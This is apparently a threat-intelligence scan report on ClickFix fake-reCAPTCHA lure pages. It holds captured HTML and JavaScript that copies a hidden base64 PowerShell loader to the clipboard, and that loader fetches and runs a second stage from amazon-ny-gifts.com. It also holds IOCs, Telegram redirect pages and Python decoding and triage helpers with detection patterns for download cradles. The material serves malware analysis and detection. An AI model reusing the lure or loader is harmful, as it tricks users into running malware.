!important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
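The clipboard string above (the identical string recurs in the lucprofessional.grupomoltz.com.br entry below) is a two-layer loader: powershell -W h (PowerShell resolves that prefix to -WindowStyle Hidden) is handed a script that base64-decodes an inner command and pipes it to iex; the inner command is iex (iwr '<url>' -UseBasicParsing).Content, so the second stage is fetched from amazon-ny-gifts.com and run in memory without touching disk. The decoder below is an added example, not ClickGrab's code and not anything from the lure: it strips the trailing "`;" (the lure's JavaScript template-literal terminator, which the extraction regex captured together with the command), recovers the inner layer and the second-stage URL, and, going beyond this report's sample, also handles the -EncodedCommand (UTF-16LE) form using a second, constructed sample that points at the reserved example.invalid domain.

```python
"""Decode a ClickFix clipboard command into its layers and second-stage URL."""
import base64
import re

# Constructed copy of the report's sample for horno-rafelet.es, including the
# trailing "`;" that is the lure's JavaScript template-literal terminator.
SAMPLE = (
    'POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('
    "'aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50'"
    ')) | iex"`;'
)

LAUNCHER = re.compile(r"^\s*(powershell|pwsh)(?:\.exe)?\b", re.I)
# [Convert]::FromBase64String('...') wrapped in UTF8.GetString: the bytes are UTF-8 text
B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
# -e / -ec / -enc / -EncodedCommand: the bytes are always UTF-16LE text
ENC_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\b\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def strip_js_template_tail(cmd):
    """Drop a trailing backtick (and ;) left over from `...`; in the lure's JS."""
    return re.sub(r"`\s*;?\s*$", "", cmd.strip())


def window_hidden(cmd):
    """True if a -W<indowStyle> H<idden> pair is present: PowerShell accepts any
    unambiguous prefix of a parameter name and of an enum value, so -W h counts."""
    for flag, value in re.findall(r"-(w[a-z]*)\s+(h[a-z]*)", cmd, re.I):
        if "windowstyle".startswith(flag.lower()) and "hidden".startswith(value.lower()):
            return True
    return False


def decode_clipboard_command(cmd):
    """Return launcher, window flag, decoded inner layers, URLs and exec/download hints."""
    cmd = strip_js_template_tail(cmd)
    m = LAUNCHER.match(cmd)
    layers = []
    for b64 in B64_ARG.findall(cmd):
        layers.append(base64.b64decode(b64).decode("utf-8", "replace"))
    for _flag, b64 in ENC_FLAG.findall(cmd):
        layers.append(base64.b64decode(b64).decode("utf-16-le", "replace"))
    everything = " ".join([cmd] + layers)
    return {
        "launcher": m.group(1).lower() if m else None,
        "window_hidden": window_hidden(cmd),
        "layers": layers,
        "stage2_urls": sorted(set(URL.findall(" ".join(layers)))),
        # the outer "| iex" runs the decoded text; the inner iex runs what iwr fetched
        "invokes_expression": bool(re.search(r"\biex\b|invoke-expression", everything, re.I)),
        "downloads": bool(re.search(
            r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|\bcurl\b", everything, re.I)),
    }


def encode_as_encodedcommand(script):
    """Build the -EncodedCommand form of a script (used only to construct SAMPLE_ENC)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Second, constructed sample (not from the report) in -EncodedCommand style,
# pointing at the reserved example.invalid domain.
SAMPLE_ENC = "powershell -nop -w hidden -enc " + encode_as_encodedcommand(
    "iex (iwr 'https://example.invalid/stage2.txt' -UseBasicParsing).Content")
```

decode_clipboard_command(SAMPLE) yields the inner layer shown in the report's Decoded field and the single second-stage URL under amazon-ny-gifts.com, which is the indicator worth blocking and hunting for; the outer domain hosting the lure changes per victim site, the loader URL does not. One detail from the lure's own stageClipboard function above is worth noting: it builds the ploy and end strings but copies only commandToRun, so the victim's clipboard holds just the PowerShell line; the "✅ I am not a robot - reCAPTCHA Verification ID" text exists only on screen, and the Win+R, Ctrl+V, Enter instructions in the verify window are what turn the clipboard content into execution.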
https://bmdcompany.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://bmdcompany.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://www.zamilgroups.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://www.zamilgroups.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://lucprofessional.grupomoltz.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"
JSON Technical Data
{ "URL": "https://lucprofessional.grupomoltz.com.br/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50", "Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r", "ClipboardCommands": "POWerShEll -W h ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
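The record above is raw scanner output: the Base64 argument to FromBase64String, the decoded download cradle, the execCommand("copy") clipboard staging, the lure keywords and the threat level are the fields a ClickFix page produces, while the two meta-refresh records before it (bmdcompany.com, zamilgroups.com) only yield a redirect URL. The following Python triage helper is an added example, not ClickGrab's own code and not code from any of the sampled pages; it reproduces those checks on constructed input. The sample HTML is an abridged copy of the captured page, the Base64 blob and the Telegram redirect are the ones in the records above, and the threat-level rule at the end is my own assumption, since the report does not document how it scores. Nothing is fetched: the decoded URL is extracted, never requested.

```python
import base64
import html
import json
import re

# Added triage helper (not ClickGrab's code). Regexes mirror the fields in the report records.
B64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
POWERSHELL_RE = re.compile(r'powershell(?:\.exe)?\s+[^"\n]*"[^"]*"', re.IGNORECASE)
CRADLE_RE = re.compile(
    r"\b(iex|Invoke-Expression|iwr|Invoke-WebRequest|DownloadString|DownloadFile|mshta|certutil)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
CLIPBOARD_RE = re.compile(r"execCommand\(\s*['\"]copy['\"]\s*\)|navigator\.clipboard\.writeText\(")
META_REFRESH_RE = re.compile(
    r"<meta[^>]+http-equiv=[\"']refresh[\"'][^>]+url=['\"]?([^'\">\s]+)", re.IGNORECASE
)
LURE_KEYWORDS = (
    "I'm not a robot", "I am not a robot", "Verification ID",
    "Verify You Are Human", "Press & hold the Windows Key",
)


def decode_b64_payloads(text):
    """Return [(blob, decoded)] for every FromBase64String('...') argument that decodes to text."""
    found = []
    for blob in B64_RE.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        # Heuristic: -EncodedCommand payloads are UTF-16LE, inline blobs like this one are UTF-8.
        for enc in ("utf-8", "utf-16-le"):
            try:
                decoded = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if all(c.isprintable() or c in "\r\n\t" for c in decoded):
                found.append((blob, decoded))
                break
    return found


def triage(html_text, url="<unknown>"):
    """Score one fetched page the way the report records do; returns a dict of findings."""
    text = html.unescape(html_text)
    findings = {
        "URL": url,
        "PowerShellCommands": [m.group(0) for m in POWERSHELL_RE.finditer(text)],
        "Base64Strings": [],
        "PowerShellDownloads": [],
        "ClipboardManipulation": bool(CLIPBOARD_RE.search(text)),
        "SuspiciousKeywords": [k for k in LURE_KEYWORDS if k in text],
        "MetaRefresh": None,
        "ThreatLevel": "None",
    }
    for blob, decoded in decode_b64_payloads(text):
        findings["Base64Strings"].append({"Base64": blob, "Decoded": decoded})
        if CRADLE_RE.search(decoded):  # only URLs that feed a download-and-execute cradle
            findings["PowerShellDownloads"].extend(URL_RE.findall(decoded))
    m = META_REFRESH_RE.search(text)
    if m:
        findings["MetaRefresh"] = m.group(1)
    # Assumed scoring (the report does not publish its rule): a PowerShell command that is
    # written to the clipboard is the ClickFix signature; a bare redirect is only recorded.
    if findings["PowerShellCommands"] and findings["ClipboardManipulation"]:
        findings["ThreatLevel"] = "High"
    elif findings["PowerShellCommands"] or findings["PowerShellDownloads"]:
        findings["ThreatLevel"] = "Medium"
    return findings


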